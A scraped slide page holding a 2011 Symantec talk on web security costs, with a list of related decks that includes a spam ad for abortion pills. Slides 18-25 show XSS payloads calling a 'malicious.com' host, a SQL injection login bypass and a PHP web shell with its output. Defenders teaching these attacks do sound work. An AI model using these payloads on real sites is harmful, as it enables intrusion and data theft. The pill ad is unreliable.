+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 

Financial Risks to Internet Security

  • 1. Costs and Financial Risks of Web Security Martin Lee CISSP CEng Dr. Les Pritchard CITP SR B03 - Costs and Financial Risks of Web Security 1
  • 2. Where the Threats Come From. Insider threats Mostly accidental data deletion. Acts of God Fire, flood, volcanos! Malicious outsiders Malware, banking trojans. (cybercriminals) SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 2
  • 3. How the Bad Guys Make Money SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 3
  • 4. Anyone’s Computer or Your Computer? Compromising any computer. Botnets Denial of service attacks. Send spam. Steal data. Compromising any computer. Banking trojans Internet bank robbery. Compromising specific systems. Targeted attacks Stealing high value data. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 4
  • 5. Making Money From Botnets – Sending Spam Traffic analysis of rogue website 26 days, 350 million spams, 28 sales But, when scaled up ~$7000 in sales per day ~$2M per year Source : C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008 (http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf) SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 5
  • 6. Making Money From Botnets – Denial of Service Can hit 100Gb/sec attack traffic. Estimated UK losses $3bn/yr. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 6
  • 7. Making Money From Banking Trojans Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/ SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 7
  • 8. Banking Trojans – Zeus Man-in-Browser Attack Malware waits for log in to internet banking, issues payments on your behalf to money mules. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 8
  • 9. Banking Trojans – Zeus Man-in-Browser Attack Malware intercepts data sent from bank, removes it’s transfers, adjusts balance, shows you what you expect to see. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 9
  • 10. Distributing Web Malware Gumblar Lifecycle CONTROLS FORWARDS Uploading web malware to your website XSS MALWARE by stealing your login details. HACKER EXPLOIT HOST ADDS XSS EXPLOIT VISITS STEALS LOGIN INSTALLS UNAFECTED MALWARE WEBSITE VICTIM SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 10
  • 11. Malware on Legitimate Domains Malicious domains lifecycle: % remaining active over time 100% Over time more than 80% of malicious domains are “Old” domains 80% “Old” domains 60% 80% 40% “New” Domains 20% 0% 0 30 60 90 120 150 180 Days SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 11
  • 12. Employee Browsing Habits SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 12
  • 13. Browsing Habits Outside of the Office 100 % of web blocks 80 60 Mobile 40 Office 20 0 20 40 60 80 100 % of users SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 13
  • 14. Distributing Web Malware – Advertising Services Subvert a legitimate website WEB PAGE Sold by sales team advertiser Sold by reseller advertiser Malware resold further distributor Adverts SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
  • 15. Fake AV SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
  • 16. Fake AV Do the maths – 1 million products sold @$39.95 $8.2 million fine = $31.75 million profit! Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
  • 17. Attacking Your Website SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 17
  • 18. My Website – XSS Example www.example.com/index.php?page=cat&category=1&PHPSESSID= SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 18
  • 19. My Website – XSS Example Attack JS – "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> URL encode it, replace ‘category’ value www.example.com/index.php?page=cat&category=1&PHPSESSID= becomes www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49 SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 19
  • 20. My Website – XSS Example Attacker can execute whatever they like: Exploit – <script src=“http://www.malicious.com/attack.js”> Redirect – window.location.href = “http://www.malicious.com/“ Why not? – document.product.price = “0.01” SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 20
  • 21. XSS Example – Click that link Email containing link WEB PAGE Embed link in discussion page ENTER TEXT SUBMIT I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”> SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 21
  • 22. SQL Injection – “Little Bobby Tables” Source: XKCD Comic - http://xkcd.com/327/ SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 22
  • 23. My Website – SQL Injection Example SQL injection: Select * from users where username = “$input” and password=md5($password); $input = ‘ admin”; -- ‘ Select * from users where username = “admin”; -- ... ignored SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 23
  • 24. My Website – SQL Injection Example How about a file like this? <? system($_REQUEST*‘cmd’+); ?> SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 24
  • 25. My Website – Now completely at mercy of attacker http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C ls -l -> %6C%73%20%2D%6C total 36 -rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.php drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc -rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old -rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php -rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~ -rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php -rw-rw-r-- 1 martin martin 1924 Nov 28 2003 product_image.php~ -rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php -rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.php SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 25
  • 26. Vulnerable Websites Skilled attackers can easily find vulnerabilities. Others can use a list of vulnerable websites. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 26
  • 27. How You Lose Money SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 27
  • 28. Data Breach Losses • Ponemon Institute & Symantec Research – Average cost per data breach $7.2 million. – $214 per breached record. – 31% of breaches are malicious or criminal attack. – Malicious attacks cost more $318 per breached record. See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01 Calculate your risk: http://databreachcalculator.com/ SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 28
  • 29. Symantec SMB Survey – What do SMBs suffer? 60% Environment downtime 50% Corporate data theft 40% Customer or employee 30% PI theft Customer financial 20% information theft Intellectual property 10% theft 0% SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 29
  • 30. Protecting Yourself. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 30
  • 31. Know Your Assets, Know Attack Vectors SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 31
  • 32. Layers of Protection Provide Maximum Detection SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 32
  • 33. Test & Monitor Your Web Services Find & fix vulnerabilities in your web services. Monitor logs to identify attacks, block attacker. You don’t need to be perfect, just better than your competitors. SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 33
  • 34. Thank you! Martin Lee Martin_lee@symantec.com +44 1452 627 042 Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice. SR B03 - Costs and Financial Risks of Web Security 34